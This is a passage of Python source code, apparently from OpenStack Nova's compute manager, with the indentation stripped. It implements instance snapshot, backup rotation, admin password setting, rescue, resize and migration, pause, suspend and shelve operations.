if instance.power_state != power_state.RUNNING:
state = instance.power_state
running = power_state.RUNNING
LOG.warning(_LW('trying to snapshot a non-running instance: '
'(state: %(state)s expected: %(running)s)'),
{'state': state, 'running': running},
instance=instance)
self._notify_about_instance_usage(
context, instance, "snapshot.start")
def update_task_state(task_state,
expected_state=expected_task_state):
instance.task_state = task_state
instance.save(expected_task_state=expected_state)
self.driver.snapshot(context, instance, image_id,
update_task_state)
instance.task_state = None
instance.save(expected_task_state=task_states.IMAGE_UPLOADING)
self._notify_about_instance_usage(context, instance,
"snapshot.end")
except (exception.InstanceNotFound,
exception.UnexpectedDeletingTaskStateError):
# the instance got deleted during the snapshot
# Quickly bail out of here
msg = 'Instance disappeared during snapshot'
LOG.debug(msg, instance=instance)
try:
image_service = glance.get_default_image_service()
image = image_service.show(context, image_id)
if image['status'] != 'active':
image_service.delete(context, image_id)
except Exception:
LOG.warning(_LW("Error while trying to clean up image %s"),
image_id, instance=instance)
except exception.ImageNotFound:
instance.task_state = None
instance.save()
msg = _LW("Image not found during snapshot")
LOG.warn(msg, instance=instance)
def _post_interrupted_snapshot_cleanup(self, context, instance):
self.driver.post_interrupted_snapshot_cleanup(context, instance)
@object_compat
@messaging.expected_exceptions(NotImplementedError)
@wrap_exception()
def volume_snapshot_create(self, context, instance, volume_id,
create_info):
self.driver.volume_snapshot_create(context, instance, volume_id,
create_info)
@object_compat
@messaging.expected_exceptions(NotImplementedError)
@wrap_exception()
def volume_snapshot_delete(self, context, instance, volume_id,
snapshot_id, delete_info):
self.driver.volume_snapshot_delete(context, instance, volume_id,
snapshot_id, delete_info)
@wrap_instance_fault
def _rotate_backups(self, context, instance, backup_type, rotation):
"""Delete excess backups associated to an instance.
Instances are allowed a fixed number of backups (the rotation number);
this method deletes the oldest backups that exceed the rotation
threshold.
:param context: security context
:param instance: Instance dict
:param backup_type: daily | weekly
:param rotation: int representing how many backups to keep around;
None if rotation shouldn't be used (as in the case of snapshots)
"""
filters = {'property-image_type': 'backup',
'property-backup_type': backup_type,
'property-instance_uuid': instance.uuid}
images = self.image_api.get_all(context, filters=filters,
sort_key='created_at', sort_dir='desc')
num_images = len(images)
LOG.debug("Found %(num_images)d images (rotation: %(rotation)d)",
{'num_images': num_images, 'rotation': rotation},
instance=instance)
if num_images > rotation:
# NOTE(sirp): this deletes all backups that exceed the rotation
# limit
excess = len(images) - rotation
LOG.debug("Rotating out %d backups", excess,
instance=instance)
for i in xrange(excess):
image = images.pop()
image_id = image['id']
LOG.debug("Deleting image %s", image_id,
instance=instance)
self.image_api.delete(context, image_id)
@object_compat
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@wrap_instance_fault
def set_admin_password(self, context, instance, new_pass):
"""Set the root/admin password for an instance on this host.
This is generally only called by API password resets after an
image has been built.
@param context: Nova auth context.
@param instance: Nova instance object.
@param new_pass: The admin password for the instance.
"""
context = context.elevated()
if new_pass is None:
# Generate a random password
new_pass = utils.generate_password()
current_power_state = self._get_power_state(context, instance)
expected_state = power_state.RUNNING
if current_power_state != expected_state:
instance.task_state = None
instance.save(expected_task_state=task_states.UPDATING_PASSWORD)
_msg = _('instance %s is not running') % instance.uuid
raise exception.InstancePasswordSetFailed(
instance=instance.uuid, reason=_msg)
try:
self.driver.set_admin_password(instance, new_pass)
LOG.info(_LI("Root password set"), instance=instance)
instance.task_state = None
instance.save(
expected_task_state=task_states.UPDATING_PASSWORD)
except NotImplementedError:
LOG.warning(_LW('set_admin_password is not implemented '
'by this driver or guest instance.'),
instance=instance)
instance.task_state = None
instance.save(
expected_task_state=task_states.UPDATING_PASSWORD)
raise NotImplementedError(_('set_admin_password is not '
'implemented by this driver or guest '
'instance.'))
except exception.UnexpectedTaskStateError:
# interrupted by another (most likely delete) task
# do not retry
raise
except Exception:
# Catch all here because this could be anything.
LOG.exception(_LE('set_admin_password failed'),
instance=instance)
self._set_instance_obj_error_state(context, instance)
# We create a new exception here so that we won't
# potentially reveal password information to the
# API caller. The real exception is logged above
_msg = _('error setting admin password')
raise exception.InstancePasswordSetFailed(
instance=instance.uuid, reason=_msg)
@wrap_exception()
@reverts_task_state
@wrap_instance_fault
def inject_file(self, context, path, file_contents, instance):
"""Write a file to the specified path in an instance on this host."""
# NOTE(russellb) Remove this method, as well as the underlying virt
# driver methods, when the compute rpc interface is bumped to 4.x
# as it is no longer used.
context = context.elevated()
current_power_state = self._get_power_state(context, instance)
expected_state = power_state.RUNNING
if current_power_state != expected_state:
LOG.warning(_LW('trying to inject a file into a non-running '
'(state: %(current_state)s expected: '
'%(expected_state)s)'),
{'current_state': current_power_state,
'expected_state': expected_state},
instance=instance)
LOG.info(_LI('injecting file to %s'), path,
instance=instance)
self.driver.inject_file(instance, path, file_contents)
def _get_rescue_image(self, context, instance, rescue_image_ref=None):
"""Determine what image should be used to boot the rescue VM."""
# 1. If rescue_image_ref is passed in, use that for rescue.
# 2. Else, use the base image associated with instance's current image.
# The idea here is to provide the customer with a rescue
# environment which they are familiar with.
# So, if they built their instance off of a Debian image,
# their rescue VM will also be Debian.
# 3. As a last resort, use instance's current image.
if not rescue_image_ref:
system_meta = utils.instance_sys_meta(instance)
rescue_image_ref = system_meta.get('image_base_image_ref')
if not rescue_image_ref:
LOG.warning(_LW('Unable to find a different image to use for '
'rescue VM, using instance\'s current image'),
instance=instance)
rescue_image_ref = instance.image_ref
image_meta = compute_utils.get_image_metadata(context, self.image_api,
rescue_image_ref,
instance)
# NOTE(belliott) bug #1227350 - xenapi needs the actual image id
image_meta['id'] = rescue_image_ref
return image_meta
@object_compat
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@wrap_instance_fault
def rescue_instance(self, context, instance, rescue_password,
rescue_image_ref=None, clean_shutdown=True):
context = context.elevated()
LOG.info(_LI('Rescuing'), context=context, instance=instance)
admin_password = (rescue_password if rescue_password else
utils.generate_password())
network_info = self._get_instance_nw_info(context, instance)
rescue_image_meta = self._get_rescue_image(context, instance,
rescue_image_ref)
extra_usage_info = {'rescue_image_name':
rescue_image_meta.get('name', '')}
self._notify_about_instance_usage(context, instance,
"rescue.start", extra_usage_info=extra_usage_info,
network_info=network_info)
try:
self._power_off_instance(context, instance, clean_shutdown)
self.driver.rescue(context, instance,
network_info,
rescue_image_meta, admin_password)
except Exception as e:
LOG.exception(_LE("Error trying to Rescue Instance"),
instance=instance)
raise exception.InstanceNotRescuable(
instance_id=instance.uuid,
reason=_("Driver Error: %s") % e)
compute_utils.notify_usage_exists(self.notifier, context, instance,
current_period=True)
instance.vm_state = vm_states.RESCUED
instance.task_state = None
instance.power_state = self._get_power_state(context, instance)
instance.launched_at = timeutils.utcnow()
instance.save(expected_task_state=task_states.RESCUING)
self._notify_about_instance_usage(context, instance,
"rescue.end", extra_usage_info=extra_usage_info,
network_info=network_info)
@object_compat
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@wrap_instance_fault
def unrescue_instance(self, context, instance):
context = context.elevated()
LOG.info(_LI('Unrescuing'), context=context, instance=instance)
network_info = self._get_instance_nw_info(context, instance)
self._notify_about_instance_usage(context, instance,
"unrescue.start", network_info=network_info)
with self._error_out_instance_on_exception(context, instance):
self.driver.unrescue(instance,
network_info)
instance.vm_state = vm_states.ACTIVE
instance.task_state = None
instance.power_state = self._get_power_state(context, instance)
instance.save(expected_task_state=task_states.UNRESCUING)
self._notify_about_instance_usage(context,
instance,
"unrescue.end",
network_info=network_info)
@object_compat
@wrap_exception()
@wrap_instance_fault
def change_instance_metadata(self, context, diff, instance):
"""Update the metadata published to the instance."""
LOG.debug("Changing instance metadata according to %r",
diff, instance=instance)
self.driver.change_instance_metadata(context, instance, diff)
def _cleanup_stored_instance_types(self, instance, restore_old=False):
"""Clean up "old" and "new" instance_type information stored in
instance's system_metadata. Optionally update the "current"
instance_type to the saved old one first.
Returns the updated system_metadata as a dict, the
post-cleanup current instance type and the to-be dropped
instance type.
"""
sys_meta = instance.system_metadata
if restore_old:
instance_type = instance.get_flavor('old')
drop_instance_type = instance.get_flavor()
instance.set_flavor(instance_type)
else:
instance_type = instance.get_flavor()
drop_instance_type = instance.get_flavor('old')
instance.delete_flavor('old')
instance.delete_flavor('new')
return sys_meta, instance_type, drop_instance_type
@wrap_exception()
@wrap_instance_event
@wrap_instance_fault
def confirm_resize(self, context, instance, reservations, migration):
quotas = objects.Quotas.from_reservations(context,
reservations,
instance=instance)
@utils.synchronized(instance.uuid)
def do_confirm_resize(context, instance, migration_id):
# NOTE(wangpan): Get the migration status from db, if it has been
# confirmed, we do nothing and return here
LOG.debug("Going to confirm migration %s", migration_id,
context=context, instance=instance)
try:
# TODO(russellb) Why are we sending the migration object just
# to turn around and look it up from the db again?
migration = objects.Migration.get_by_id(
context.elevated(), migration_id)
except exception.MigrationNotFound:
LOG.error(_LE("Migration %s is not found during confirmation"),
migration_id, context=context, instance=instance)
quotas.rollback()
return
if migration.status == 'confirmed':
LOG.info(_LI("Migration %s is already confirmed"),
migration_id, context=context, instance=instance)
quotas.rollback()
return
elif migration.status not in ('finished', 'confirming'):
LOG.warning(_LW("Unexpected confirmation status '%(status)s' "
"of migration %(id)s, exit confirmation "
"process"),
{"status": migration.status, "id": migration_id},
context=context, instance=instance)
quotas.rollback()
return
# NOTE(wangpan): Get the instance from db, if it has been
# deleted, we do nothing and return here
expected_attrs = ['metadata', 'system_metadata', 'flavor']
try:
instance = objects.Instance.get_by_uuid(
context, instance.uuid,
expected_attrs=expected_attrs)
except exception.InstanceNotFound:
LOG.info(_LI("Instance is not found during confirmation"),
context=context, instance=instance)
quotas.rollback()
return
self._confirm_resize(context, instance, quotas,
migration=migration)
do_confirm_resize(context, instance, migration.id)
def _confirm_resize(self, context, instance, quotas,
migration=None):
"""Destroys the source instance."""
self._notify_about_instance_usage(context, instance,
"resize.confirm.start")
with self._error_out_instance_on_exception(context, instance,
quotas=quotas):
# NOTE(danms): delete stashed migration information
sys_meta, instance_type, old_instance_type = (
self._cleanup_stored_instance_types(instance))
sys_meta.pop('old_vm_state', None)
instance.system_metadata = sys_meta
instance.save()
# NOTE(tr3buchet): tear down networks on source host
self.network_api.setup_networks_on_host(context, instance,
migration.source_compute, teardown=True)
network_info = self._get_instance_nw_info(context, instance)
self.driver.confirm_migration(migration, instance,
network_info)
migration.status = 'confirmed'
with migration.obj_as_admin():
migration.save()
rt = self._get_resource_tracker(migration.source_node)
rt.drop_resize_claim(context, instance, old_instance_type)
# NOTE(mriedem): The old_vm_state could be STOPPED but the user
# might have manually powered up the instance to confirm the
# resize/migrate, so we need to check the current power state
# on the instance and set the vm_state appropriately. We default
# to ACTIVE because if the power state is not SHUTDOWN, we
# assume _sync_instance_power_state will clean it up.
p_state = instance.power_state
vm_state = None
if p_state == power_state.SHUTDOWN:
vm_state = vm_states.STOPPED
LOG.debug("Resized/migrated instance is powered off. "
"Setting vm_state to '%s'.", vm_state,
instance=instance)
else:
vm_state = vm_states.ACTIVE
instance.vm_state = vm_state
instance.task_state = None
instance.save(expected_task_state=[None, task_states.DELETING])
self._notify_about_instance_usage(
context, instance, "resize.confirm.end",
network_info=network_info)
quotas.commit()
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@errors_out_migration
@wrap_instance_fault
def revert_resize(self, context, instance, migration, reservations):
"""Destroys the new instance on the destination machine.
Reverts the model changes, and powers on the old instance on the
source machine.
"""
quotas = objects.Quotas.from_reservations(context,
reservations,
instance=instance)
# NOTE(comstud): A revert_resize is essentially a resize back to
# the old size, so we need to send a usage event here.
compute_utils.notify_usage_exists(self.notifier, context, instance,
current_period=True)
with self._error_out_instance_on_exception(context, instance,
quotas=quotas):
# NOTE(tr3buchet): tear down networks on destination host
self.network_api.setup_networks_on_host(context, instance,
teardown=True)
migration_p = obj_base.obj_to_primitive(migration)
self.network_api.migrate_instance_start(context,
instance,
migration_p)
network_info = self._get_instance_nw_info(context, instance)
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
block_device_info = self._get_instance_block_device_info(
context, instance, bdms=bdms)
destroy_disks = not self._is_instance_storage_shared(
context, instance, host=migration.source_compute)
self.driver.destroy(context, instance, network_info,
block_device_info, destroy_disks)
self._terminate_volume_connections(context, instance, bdms)
migration.status = 'reverted'
with migration.obj_as_admin():
migration.save()
rt = self._get_resource_tracker(instance.node)
rt.drop_resize_claim(context, instance)
self.compute_rpcapi.finish_revert_resize(context, instance,
migration, migration.source_compute,
quotas.reservations)
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@errors_out_migration
@wrap_instance_fault
def finish_revert_resize(self, context, instance, reservations, migration):
"""Finishes the second half of reverting a resize.
Bring the original source instance state back (active/shutoff) and
revert the resized attributes in the database.
"""
quotas = objects.Quotas.from_reservations(context,
reservations,
instance=instance)
with self._error_out_instance_on_exception(context, instance,
quotas=quotas):
network_info = self._get_instance_nw_info(context, instance)
self._notify_about_instance_usage(
context, instance, "resize.revert.start")
sys_meta, instance_type, drop_instance_type = (
self._cleanup_stored_instance_types(instance, True))
# NOTE(mriedem): delete stashed old_vm_state information; we
# default to ACTIVE for backwards compatibility if old_vm_state
# is not set
old_vm_state = sys_meta.pop('old_vm_state', vm_states.ACTIVE)
instance.system_metadata = sys_meta
instance.memory_mb = instance_type['memory_mb']
instance.vcpus = instance_type['vcpus']
instance.root_gb = instance_type['root_gb']
instance.ephemeral_gb = instance_type['ephemeral_gb']
instance.instance_type_id = instance_type['id']
instance.host = migration.source_compute
instance.node = migration.source_node
instance.save()
migration.dest_compute = migration.source_compute
with migration.obj_as_admin():
migration.save()
self.network_api.setup_networks_on_host(context, instance,
migration.source_compute)
block_device_info = self._get_instance_block_device_info(
context, instance, refresh_conn_info=True)
power_on = old_vm_state != vm_states.STOPPED
self.driver.finish_revert_migration(context, instance,
network_info,
block_device_info, power_on)
instance.launched_at = timeutils.utcnow()
instance.save(expected_task_state=task_states.RESIZE_REVERTING)
migration_p = obj_base.obj_to_primitive(migration)
self.network_api.migrate_instance_finish(context,
instance,
migration_p)
# if the original vm state was STOPPED, set it back to STOPPED
LOG.info(_LI("Updating instance to original state: '%s'"),
old_vm_state)
if power_on:
instance.vm_state = vm_states.ACTIVE
instance.task_state = None
instance.save()
else:
instance.task_state = task_states.POWERING_OFF
instance.save()
self.stop_instance(context, instance=instance)
self._notify_about_instance_usage(
context, instance, "resize.revert.end")
quotas.commit()
def _prep_resize(self, context, image, instance, instance_type,
quotas, request_spec, filter_properties, node,
clean_shutdown=True):
if not filter_properties:
filter_properties = {}
if not instance.host:
self._set_instance_error_state(context, instance)
msg = _('Instance has no source host')
raise exception.MigrationError(reason=msg)
same_host = instance.host == self.host
if same_host and not CONF.allow_resize_to_same_host:
self._set_instance_error_state(context, instance)
msg = _('destination same as source!')
raise exception.MigrationError(reason=msg)
# NOTE(danms): Stash the new instance_type to avoid having to
# look it up in the database later
instance.set_flavor(instance_type, 'new')
# NOTE(mriedem): Stash the old vm_state so we can set the
# resized/reverted instance back to the same state later.
vm_state = instance.vm_state
LOG.debug('Stashing vm_state: %s', vm_state, instance=instance)
instance.system_metadata['old_vm_state'] = vm_state
instance.save()
limits = filter_properties.get('limits', {})
rt = self._get_resource_tracker(node)
with rt.resize_claim(context, instance, instance_type,
image_meta=image, limits=limits) as claim:
LOG.info(_LI('Migrating'), context=context, instance=instance)
self.compute_rpcapi.resize_instance(
context, instance, claim.migration, image,
instance_type, quotas.reservations,
clean_shutdown)
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@wrap_instance_fault
def prep_resize(self, context, image, instance, instance_type,
reservations, request_spec, filter_properties, node,
clean_shutdown=True):
"""Initiates the process of moving a running instance to another host.
Possibly changes the RAM and disk size in the process.
"""
if node is None:
node = self.driver.get_available_nodes(refresh=True)[0]
LOG.debug("No node specified, defaulting to %s", node,
instance=instance)
quotas = objects.Quotas.from_reservations(context,
reservations,
instance=instance)
with self._error_out_instance_on_exception(context, instance,
quotas=quotas):
compute_utils.notify_usage_exists(self.notifier, context, instance,
current_period=True)
self._notify_about_instance_usage(
context, instance, "resize.prep.start")
try:
self._prep_resize(context, image, instance,
instance_type, quotas,
request_spec, filter_properties,
node, clean_shutdown)
# NOTE(dgenin): This is thrown in LibvirtDriver when the
# instance to be migrated is backed by LVM.
# Remove when LVM migration is implemented.
except exception.MigrationPreCheckError:
raise
except Exception:
# try to re-schedule the resize elsewhere:
exc_info = sys.exc_info()
self._reschedule_resize_or_reraise(context, image, instance,
exc_info, instance_type, quotas, request_spec,
filter_properties)
finally:
extra_usage_info = dict(
new_instance_type=instance_type['name'],
new_instance_type_id=instance_type['id'])
self._notify_about_instance_usage(
context, instance, "resize.prep.end",
extra_usage_info=extra_usage_info)
def _reschedule_resize_or_reraise(self, context, image, instance, exc_info,
instance_type, quotas, request_spec, filter_properties):
"""Try to re-schedule the resize or re-raise the original error to
error out the instance.
"""
if not request_spec:
request_spec = {}
if not filter_properties:
filter_properties = {}
rescheduled = False
instance_uuid = instance.uuid
try:
reschedule_method = self.compute_task_api.resize_instance
scheduler_hint = dict(filter_properties=filter_properties)
method_args = (instance, None, scheduler_hint, instance_type,
quotas.reservations)
task_state = task_states.RESIZE_PREP
rescheduled = self._reschedule(context, request_spec,
filter_properties, instance, reschedule_method,
method_args, task_state, exc_info)
except Exception as error:
rescheduled = False
LOG.exception(_LE("Error trying to reschedule"),
instance_uuid=instance_uuid)
compute_utils.add_instance_fault_from_exc(context,
instance, error,
exc_info=sys.exc_info())
self._notify_about_instance_usage(context, instance,
'resize.error', fault=error)
if rescheduled:
self._log_original_error(exc_info, instance_uuid)
compute_utils.add_instance_fault_from_exc(context,
instance, exc_info[1], exc_info=exc_info)
self._notify_about_instance_usage(context, instance,
'resize.error', fault=exc_info[1])
else:
# not re-scheduling
raise exc_info[0], exc_info[1], exc_info[2]
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@errors_out_migration
@wrap_instance_fault
def resize_instance(self, context, instance, image,
reservations, migration, instance_type,
clean_shutdown=True):
"""Starts the migration of a running instance to another host."""
quotas = objects.Quotas.from_reservations(context,
reservations,
instance=instance)
with self._error_out_instance_on_exception(context, instance,
quotas=quotas):
# Code downstream may expect extra_specs to be populated since it
# is receiving an object, so lookup the flavor to ensure this.
if (not instance_type or
not isinstance(instance_type, objects.Flavor)):
instance_type = objects.Flavor.get_by_id(
context, migration['new_instance_type_id'])
network_info = self._get_instance_nw_info(context, instance)
migration.status = 'migrating'
with migration.obj_as_admin():
migration.save()
instance.task_state = task_states.RESIZE_MIGRATING
instance.save(expected_task_state=task_states.RESIZE_PREP)
self._notify_about_instance_usage(
context, instance, "resize.start", network_info=network_info)
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
block_device_info = self._get_instance_block_device_info(
context, instance, bdms=bdms)
timeout, retry_interval = self._get_power_off_values(context,
instance, clean_shutdown)
disk_info = self.driver.migrate_disk_and_power_off(
context, instance, migration.dest_host,
instance_type, network_info,
block_device_info,
timeout, retry_interval)
self._terminate_volume_connections(context, instance, bdms)
migration_p = obj_base.obj_to_primitive(migration)
self.network_api.migrate_instance_start(context,
instance,
migration_p)
migration.status = 'post-migrating'
with migration.obj_as_admin():
migration.save()
instance.host = migration.dest_compute
instance.node = migration.dest_node
instance.task_state = task_states.RESIZE_MIGRATED
instance.save(expected_task_state=task_states.RESIZE_MIGRATING)
self.compute_rpcapi.finish_resize(context, instance,
migration, image, disk_info,
migration.dest_compute, reservations=quotas.reservations)
self._notify_about_instance_usage(context, instance, "resize.end",
network_info=network_info)
self.instance_events.clear_events_for_instance(instance)
def _terminate_volume_connections(self, context, instance, bdms):
connector = self.driver.get_volume_connector(instance)
for bdm in bdms:
if bdm.is_volume:
self.volume_api.terminate_connection(context, bdm.volume_id,
connector)
@staticmethod
def _set_instance_info(instance, instance_type):
instance.instance_type_id = instance_type['id']
instance.memory_mb = instance_type['memory_mb']
instance.vcpus = instance_type['vcpus']
instance.root_gb = instance_type['root_gb']
instance.ephemeral_gb = instance_type['ephemeral_gb']
instance.set_flavor(instance_type)
def _finish_resize(self, context, instance, migration, disk_info,
image):
resize_instance = False
old_instance_type_id = migration['old_instance_type_id']
new_instance_type_id = migration['new_instance_type_id']
old_instance_type = instance.get_flavor()
# NOTE(mriedem): Get the old_vm_state so we know if we should
# power on the instance. If old_vm_state is not set we need to default
# to ACTIVE for backwards compatibility
old_vm_state = instance.system_metadata.get('old_vm_state',
vm_states.ACTIVE)
instance.set_flavor(old_instance_type, 'old')
if old_instance_type_id != new_instance_type_id:
instance_type = instance.get_flavor('new')
self._set_instance_info(instance, instance_type)
resize_instance = True
# NOTE(tr3buchet): setup networks on destination host
self.network_api.setup_networks_on_host(context, instance,
migration['dest_compute'])
migration_p = obj_base.obj_to_primitive(migration)
self.network_api.migrate_instance_finish(context,
instance,
migration_p)
network_info = self._get_instance_nw_info(context, instance)
instance.task_state = task_states.RESIZE_FINISH
instance.save(expected_task_state=task_states.RESIZE_MIGRATED)
self._notify_about_instance_usage(
context, instance, "finish_resize.start",
network_info=network_info)
block_device_info = self._get_instance_block_device_info(
context, instance, refresh_conn_info=True)
# NOTE(mriedem): If the original vm_state was STOPPED, we don't
# automatically power on the instance after it's migrated
power_on = old_vm_state != vm_states.STOPPED
try:
self.driver.finish_migration(context, migration, instance,
disk_info,
network_info,
image, resize_instance,
block_device_info, power_on)
except Exception:
with excutils.save_and_reraise_exception():
if resize_instance:
self._set_instance_info(instance,
old_instance_type)
migration.status = 'finished'
with migration.obj_as_admin():
migration.save()
instance.vm_state = vm_states.RESIZED
instance.task_state = None
instance.launched_at = timeutils.utcnow()
instance.save(expected_task_state=task_states.RESIZE_FINISH)
self._update_scheduler_instance_info(context, instance)
self._notify_about_instance_usage(
context, instance, "finish_resize.end",
network_info=network_info)
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@errors_out_migration
@wrap_instance_fault
def finish_resize(self, context, disk_info, image, instance,
reservations, migration):
"""Completes the migration process.
Sets up the newly transferred disk and turns on the instance at its
new host machine.
"""
quotas = objects.Quotas.from_reservations(context,
reservations,
instance=instance)
try:
self._finish_resize(context, instance, migration,
disk_info, image)
quotas.commit()
except Exception:
LOG.exception(_LE('Setting instance vm_state to ERROR'),
instance=instance)
with excutils.save_and_reraise_exception():
try:
quotas.rollback()
except Exception:
LOG.exception(_LE("Failed to rollback quota for failed "
"finish_resize"),
instance=instance)
self._set_instance_error_state(context, instance)
@object_compat
@wrap_exception()
@wrap_instance_fault
def add_fixed_ip_to_instance(self, context, network_id, instance):
"""Calls network_api to add new fixed_ip to instance
then injects the new network info and resets instance networking.
"""
self._notify_about_instance_usage(
context, instance, "create_ip.start")
network_info = self.network_api.add_fixed_ip_to_instance(context,
instance,
network_id)
self._inject_network_info(context, instance, network_info)
self.reset_network(context, instance)
# NOTE(russellb) We just want to bump updated_at. See bug 1143466.
instance.updated_at = timeutils.utcnow()
instance.save()
self._notify_about_instance_usage(
context, instance, "create_ip.end", network_info=network_info)
@object_compat
@wrap_exception()
@wrap_instance_fault
def remove_fixed_ip_from_instance(self, context, address, instance):
"""Calls network_api to remove existing fixed_ip from instance
by injecting the altered network info and resetting
instance networking.
"""
self._notify_about_instance_usage(
context, instance, "delete_ip.start")
network_info = self.network_api.remove_fixed_ip_from_instance(context,
instance,
address)
self._inject_network_info(context, instance, network_info)
self.reset_network(context, instance)
# NOTE(russellb) We just want to bump updated_at. See bug 1143466.
instance.updated_at = timeutils.utcnow()
instance.save()
self._notify_about_instance_usage(
context, instance, "delete_ip.end", network_info=network_info)
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@wrap_instance_fault
def pause_instance(self, context, instance):
"""Pause an instance on this host."""
context = context.elevated()
LOG.info(_LI('Pausing'), context=context, instance=instance)
self._notify_about_instance_usage(context, instance, 'pause.start')
self.driver.pause(instance)
instance.power_state = self._get_power_state(context, instance)
instance.vm_state = vm_states.PAUSED
instance.task_state = None
instance.save(expected_task_state=task_states.PAUSING)
self._notify_about_instance_usage(context, instance, 'pause.end')
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@wrap_instance_fault
def unpause_instance(self, context, instance):
"""Unpause a paused instance on this host."""
context = context.elevated()
LOG.info(_LI('Unpausing'), context=context, instance=instance)
self._notify_about_instance_usage(context, instance, 'unpause.start')
self.driver.unpause(instance)
instance.power_state = self._get_power_state(context, instance)
instance.vm_state = vm_states.ACTIVE
instance.task_state = None
instance.save(expected_task_state=task_states.UNPAUSING)
self._notify_about_instance_usage(context, instance, 'unpause.end')
@wrap_exception()
def host_power_action(self, context, action):
"""Reboots, shuts down or powers up the host."""
return self.driver.host_power_action(action)
@wrap_exception()
def host_maintenance_mode(self, context, host, mode):
"""Start/Stop host maintenance window. On start, it triggers
guest VMs evacuation.
"""
return self.driver.host_maintenance_mode(host, mode)
@wrap_exception()
def set_host_enabled(self, context, enabled):
"""Sets the specified host's ability to accept new instances."""
return self.driver.set_host_enabled(enabled)
@wrap_exception()
def get_host_uptime(self, context):
"""Returns the result of calling "uptime" on the target host."""
return self.driver.get_host_uptime()
@object_compat
@wrap_exception()
@wrap_instance_fault
def get_diagnostics(self, context, instance):
"""Retrieve diagnostics for an instance on this host."""
current_power_state = self._get_power_state(context, instance)
if current_power_state == power_state.RUNNING:
LOG.info(_LI("Retrieving diagnostics"), context=context,
instance=instance)
return self.driver.get_diagnostics(instance)
else:
raise exception.InstanceInvalidState(
attr='power_state',
instance_uuid=instance.uuid,
state=instance.power_state,
method='get_diagnostics')
@object_compat
@wrap_exception()
@wrap_instance_fault
def get_instance_diagnostics(self, context, instance):
"""Retrieve diagnostics for an instance on this host."""
current_power_state = self._get_power_state(context, instance)
if current_power_state == power_state.RUNNING:
LOG.info(_LI("Retrieving diagnostics"), context=context,
instance=instance)
diags = self.driver.get_instance_diagnostics(instance)
return diags.serialize()
else:
raise exception.InstanceInvalidState(
attr='power_state',
instance_uuid=instance.uuid,
state=instance.power_state,
method='get_diagnostics')
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@wrap_instance_fault
def suspend_instance(self, context, instance):
"""Suspend the given instance."""
context = context.elevated()
# Store the old state
instance.system_metadata['old_vm_state'] = instance.vm_state
self._notify_about_instance_usage(context, instance, 'suspend.start')
with self._error_out_instance_on_exception(context, instance,
instance_state=instance.vm_state):
self.driver.suspend(context, instance)
instance.power_state = self._get_power_state(context, instance)
instance.vm_state = vm_states.SUSPENDED
instance.task_state = None
instance.save(expected_task_state=task_states.SUSPENDING)
self._notify_about_instance_usage(context, instance, 'suspend.end')
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@wrap_instance_fault
def resume_instance(self, context, instance):
"""Resume the given suspended instance."""
context = context.elevated()
LOG.info(_LI('Resuming'), context=context, instance=instance)
self._notify_about_instance_usage(context, instance, 'resume.start')
network_info = self._get_instance_nw_info(context, instance)
block_device_info = self._get_instance_block_device_info(
context, instance)
with self._error_out_instance_on_exception(context, instance,
instance_state=instance.vm_state):
self.driver.resume(context, instance, network_info,
block_device_info)
instance.power_state = self._get_power_state(context, instance)
# We default to the ACTIVE state for backwards compatibility
instance.vm_state = instance.system_metadata.pop('old_vm_state',
vm_states.ACTIVE)
instance.task_state = None
instance.save(expected_task_state=task_states.RESUMING)
self._notify_about_instance_usage(context, instance, 'resume.end')
@wrap_exception()
@reverts_task_state
@wrap_instance_event
@wrap_instance_fault
def shelve_instance(self, context, instance, image_id,
clean_shutdown=True):
"""Shelve an instance.
This should be used when you want to take a snapshot of the instance.
It also adds system_metadata that can be used by a periodic task to
offload the shelved instance after a period of time.
:param context: request context
:param instance: an Instance object
:param image_id: an image id to snapshot to.
:param clean_shutdown: give the GuestOS a chance to stop
"""
compute_utils.notify_usage_exists(self.notifier, context, instance,
current_period=True)
self._notify_about_instance_usage(context, instance, 'shelve.start')
def update_task_state(task_state, expected_state=task_states.SHELVING):
shelving_state_map = {
task_states.IMAGE_PENDING_UPLOAD:
task_states.SHELVING_IMAGE_PENDING_UPLOAD,
task_states.IMAGE_UPLOADING:
task_states.SHELVING_IMAGE_UPLOADING,
task_states.SHELVING: task_states.SHELVING}
task_state = shelving_state_map[task_state]
expected_state = shelving_state_map[expected_state]
instance.task_state = task_state
instance.save(expected_task_state=expected_state)
self._power_off_instance(context, instance, clean_shutdown)
self.driver.snapshot(context, instance, image_id, update_task_state)
instance.system_metadata['shelved_at'] = timeutils.strtime()
instance.system_metadata['shelved_image_id'] = image_id
instance.system_metadata['shelved_host'] = self.host
instance.vm_state = vm_states.SHELVED
instance.task_state = None
if CONF.shelved_offload_time == 0:
instance.task_state = task_states.SHELVING_OFFLOADING
instance.power_state = self._get_power_state(context, instance)
instance.save(expected_task_state=[
task_states.SHELVING,
task_states.SHELVING_IMAGE_UPLOADING])
self._notify_about_instance_usage(context, instance, 'shelve.end')
if CONF.shelved_offload_time == 0:
self.shelve_offload_instance(context, instance,
clean_shutdown=False)
@wrap_exception()
@reverts_task_state
@wrap_instance_fault
def shelve_offload_instance(self, context, instance, clean_shutdown=True):
"""Remove a shelved instance from the hypervisor.
This frees up those resources for use by other instances, but may lead
to slower unshelve times for this instance. This method is used by
volume backed instances since restoring them doesn't involve the
potentially large download of an image.
:param context: request context
:param instance: nova.objects.instance.Instance
:param clean_shutdown: give the GuestOS a chance to stop
"""
self._notify_about_instance_usage(context, instance,
'shelve_offload.start')
self._power_off_instance(context, instance, clean_shutdown)
current_power_state = self._get_power_state(context, instance)
self.network_api.cleanup_instance_network_on_host(context, instance,
instance.host)
network_info = self._get_instance_nw_info(context, instance)
block_device_info = self._get_instance_block_device_info(context,
instance)
self.driver.destroy(context, instance, network_info,
block_device_info)
instance.power_state = current_power_state
instance.host = None
instance.node = None
instance.vm_state = vm_states.SHELVED_OFFLOADED
